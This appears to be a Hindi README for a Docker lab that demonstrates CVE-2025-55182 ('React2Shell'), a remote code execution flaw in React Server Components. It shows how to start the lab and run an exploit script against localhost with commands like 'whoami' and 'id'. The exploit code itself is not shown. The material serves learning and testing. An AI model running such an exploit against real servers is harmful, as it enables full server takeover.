
CVE-2025-55182 (React2Shell) को समझने और उसका शोषण करने के लिए एक व्यावहारिक लैब - React Server Components में रिमोट कोड निष्पादन (Remote Code Execution)
CVE-2025-55182 (React2Shell) का शोषण करने के लिए एक व्यावहारिक लैब - React सर्वर घटकों में रिमोट कोड निष्पादन (RCE)।
केवल शैक्षिक उद्देश्यों के लिए। केवल उन्हीं सिस्टम पर परीक्षण करें जिनके आप स्वामी हैं।
# Clone and start
git clone https://github.com/dhananjayakumarn/CVE-2025-55182-Lab.git
cd CVE-2025-55182-Lab
docker-compose up -d
# Wait 20 seconds, then exploit
python3 exploit.py http://localhost:3000 "whoami"
बस इतना ही! आपको RCE साबित करने वाला कमांड आउटपुट दिखना चाहिए।
React सर्वर घटकों में गंभीर RCE भेद्यता (CVSS 10.0)।
प्रभावित:
प्रभाव: एक HTTP अनुरोध = पूर्ण सर्वर नियंत्रण
python3 exploit.py <target> <command>
# Examples
python3 exploit.py http://localhost:3000 "whoami"
python3 exploit.py http://localhost:3000 "id"
python3 exploit.py http://localhost:3000 "ls -la"
docker-compose down
⭐ अगर इससे आपको सीखने में मदद मिली तो स्टार करें!